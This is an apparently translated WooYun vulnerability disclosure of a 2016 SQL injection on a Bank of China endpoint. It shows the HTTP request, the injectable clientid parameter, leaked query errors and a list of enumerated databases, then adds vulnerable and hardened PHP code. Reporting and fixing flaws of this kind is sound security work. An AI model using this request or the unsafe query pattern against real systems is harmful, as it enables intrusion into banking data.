Vulnerability summary

Defect ID: wooyun-2016-0205199

Title: MySQL injection on a Bank of China site (exposes administrator passwords and a large volume of user card-number data)

Affected vendor: Bank of China

Author: Aasron

Submitted: 2016-05-05 10:24

Fixed: 2016-06-19 22:10

Disclosed: 2016-06-19 22:10

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure timeline:

2016-05-05: Details sent to the vendor; awaiting vendor handling
2016-05-05: Vendor confirmed; details disclosed to the vendor only
2016-05-15: Details disclosed to core white hats and domain experts
2016-05-25: Details disclosed to regular white hats
2016-06-04: Details disclosed to intern white hats
2016-06-19: Details disclosed to the public

Brief description:

MySQL injection on a Bank of China site (exposes administrator passwords and information on a million users)

Details:

PUT /interFace/getAppUpdate.php HTTP/1.1
Host: open.boc.cn
Content-Type: application/json
Connection: close
Accept: application/json
User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 29

{"clientid":"399","type":"1"}


Injection parameter: clientid (the value is concatenated into the SQL unquoted, so any non-numeric input reaches the parser)


Normal response

{"clientkey":"399","version":"1.0.2","appversion":"177","appurl":"http:\/\/open.boc.cn\/apps\/appdownload\/41295","need_update":"0","new_function":"","appfilesize":"","incrementSize":""}


Error response (the server echoes the full failed query and the MySQL error back to the client)

<b>MySQL server error report:Array
(
[0] => Array
(
[message] => MySQL Query Error
)
[1] => Array
(
[sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods` where client_key=399'
)
[2] => Array
(
[error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
)
[3] => Array
(
[errno] => 1064
)
)

Proof of vulnerability:

available databases [11]:
[*] bim
[*] container
[*] ec
[*] ezcis
[*] information_schema
[*] mysql
[*] ndbinfo
[*] performance_schema
[*] sap
[*] test
[*] ultrax


Current database: ec






To protect users, I did not test any further.

Remediation:

Filter the input, and the like.

Copyright notice: when republishing, credit the source: Aasron@WooYun
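As an added example (not the affected site's code), here is the query shape recovered from the error dump above, first in the unsafe concatenated form that produced the `near '''` error, then hardened: the JSON value is validated as an integer, bound as a prepared-statement parameter, and driver errors are logged instead of echoed to the client. The PDO connection, credentials and handler wiring are assumptions.

```php
<?php
// Unsafe shape (matches the echoed query): clientid is spliced straight into the SQL,
// so a value such as 399' breaks the statement and a crafted value would change it.
function getAppUpdateUnsafe(PDO $pdo, array $body): ?array
{
    $sql = "SELECT goods_name, ios_file, app_version, goods_id, client_key AS clientkey,"
         . " need_update, new_function, category_ver AS appversion"
         . " FROM `ec`.`aps_goods` WHERE client_key=" . ($body['clientid'] ?? '');
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Hardened: accept only a non-negative integer, bind it as a typed parameter, and
// never let the SQL text or the MySQL error reach the HTTP response.
function getAppUpdateSafe(PDO $pdo, array $body): ?array
{
    $clientId = filter_var($body['clientid'] ?? null, FILTER_VALIDATE_INT,
                           ['options' => ['min_range' => 0]]);
    if ($clientId === false) {
        http_response_code(400);           // reject "399'" and any other non-integer
        return null;
    }
    $stmt = $pdo->prepare(
        "SELECT goods_name, ios_file, app_version, goods_id, client_key AS clientkey,"
      . " need_update, new_function, category_ver AS appversion"
      . " FROM `ec`.`aps_goods` WHERE client_key = :client_key"
    );
    $stmt->bindValue(':client_key', $clientId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Assumed handler wiring: parse the JSON body the endpoint expects and answer in JSON.
$body = json_decode(file_get_contents('php://input'), true) ?? [];
$pdo  = new PDO('mysql:host=localhost;dbname=ec;charset=utf8mb4', 'db_user', 'db_pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,  // fail closed on query errors
    PDO::ATTR_EMULATE_PREPARES => false,                   // real server-side prepares
]);
header('Content-Type: application/json');
try {
    $row = getAppUpdateSafe($pdo, $body);
    echo json_encode($row ?? ['need_update' => '0']);
} catch (PDOException $e) {
    error_log($e->getMessage());           // details stay in the server log only
    http_response_code(500);
    echo json_encode(['error' => 'internal error']);
}
```

The error dump on this page is itself a second finding worth fixing: a generic 500 body plus server-side logging removes the query and error text that made the injection point easy to confirm.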


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2016-05-05 22:07

Vendor reply:

Thanks to the white hat.

Latest status:

None yet


Comments:

  1. 2016-05-05 10:37 | Dotaer ( Passerby | Rank:28 Vulns:8 | Study more, dig more bugs! )

    Master, are you taking apprentices?

  2. 2016-05-05 10:59 | 无名 ( Intern white hat | Rank:41 Vulns:9 | I'm just a little rookie bird, E-I-E-I-O. )

    A bank...

  3. 2016-05-05 11:25 | 开心一下1313 ( Intern white hat | Rank:77 Vulns:27 | Take a sip of water and calm down...... )

    Rich.

  4. 2016-05-06 08:17 | _Thorns ( Regular white hat | Rank:1744 Vulns:269 | Most people's effort is so low that talent never even comes into play... )

    Looks like bro's secret weapon is already written.